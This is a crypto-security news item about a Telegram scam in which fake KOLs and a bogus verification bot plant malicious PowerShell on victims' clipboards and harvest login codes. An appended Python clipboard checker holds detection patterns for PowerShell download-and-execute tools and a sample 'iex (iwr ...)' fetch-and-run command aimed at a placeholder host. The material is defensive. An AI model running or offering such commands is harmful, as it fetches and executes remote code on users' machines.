Scam Sniffer: Please be aware of a new Telegram scam method where fake crypto KOLs spread malware
Dec 10, 2024 21:27:25
ChainCatcher news: Scam Sniffer has issued a security warning about a new type of composite scam targeting cryptocurrency users. The scam has two main attack paths: system infection and account hijacking. The scammers first disguise themselves as well-known cryptocurrency KOLs and comment on legitimate posts to lure users into joining so-called "exclusive investment" Telegram groups. Once users join the group, they immediately receive a verification request from a fake bot named OfficiaISafeguardBot. These verifications are usually given very short time windows to create a sense of urgency.
On a technical level, the verification process injects malicious PowerShell code into the clipboard without the user's knowledge. Once executed, the code automatically downloads and runs malware that can compromise system security. This malware has been flagged as malicious by VirusTotal and has recently caused multiple incidents of private key theft. The other attack method is to induce users to provide Telegram account-related information, including phone numbers, login verification codes, and two-step verification passwords, thereby giving the scammers complete control over the user's Telegram account.
Scam Sniffer offers the following security recommendations:
- Do not execute commands from unknown sources
- Carefully verify the authenticity of official channels
- Be vigilant about any verification requests with time pressure
- Use hardware wallets to store cryptocurrency assets
- Avoid running arbitrary code and installing unknown software
- Never share Telegram verification codes and two-step verification passwords
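To make the first recommendation checkable, the following added example (not code from Scam Sniffer or ChainCatcher) scores text that has already been read from the clipboard before it is pasted into a terminal. The indicator patterns, the verdict names and the sample strings are assumptions constructed for illustration.

```python
import re

# Heuristic indicators: assumptions for this example, not taken from the alert.
INDICATORS = {
    "powershell_invocation": re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I),
    # -e / -enc / -EncodedCommand followed by a long base64-looking argument
    "encoded_command": re.compile(r"(?<![\w-])-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I),
    # -w / -WindowStyle hidden keeps the console out of sight
    "hidden_window": re.compile(r"(?<![\w-])-w[a-z]*\s+hidden\b", re.I),
    "remote_fetch": re.compile(
        r"\b(?:iwr|irm|curl|wget|Invoke-WebRequest|Invoke-RestMethod|"
        r"DownloadString|DownloadFile|Start-BitsTransfer)\b", re.I),
    "in_memory_exec": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "url": re.compile(r"https?://", re.I),
}


def inspect_clipboard(text):
    """Return (verdict, sorted indicator names) for text about to be pasted."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    shell = "powershell_invocation" in hits
    fetch_and_run = "remote_fetch" in hits and "in_memory_exec" in hits
    if fetch_and_run or "encoded_command" in hits or (shell and "hidden_window" in hits):
        return "block", hits
    if shell or ("remote_fetch" in hits and "url" in hits):
        return "review", hits
    return "allow", hits


# Constructed sample clipboard contents (example.invalid is a reserved name).
SAMPLES = {
    "login code": "482913",
    "wallet address": "0x" + "ab" * 20,
    "fetch and run": 'powershell -w hidden -c "iex (iwr https://example.invalid/verify.ps1)"',
    "encoded command": "powershell -enc " + "QUJD" * 10,
    "docs snippet": "Run powershell and type Get-ChildItem",
}

if __name__ == "__main__":
    for label, text in SAMPLES.items():
        verdict, hits = inspect_clipboard(text)
        print(f"{label:16} {verdict:7} {', '.join(hits) or '-'}")
```

A "block" verdict means the text combines a remote download with in-memory execution, carries an encoded command, or starts PowerShell with a hidden window; "review" means it deserves a manual look before anything is pasted.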


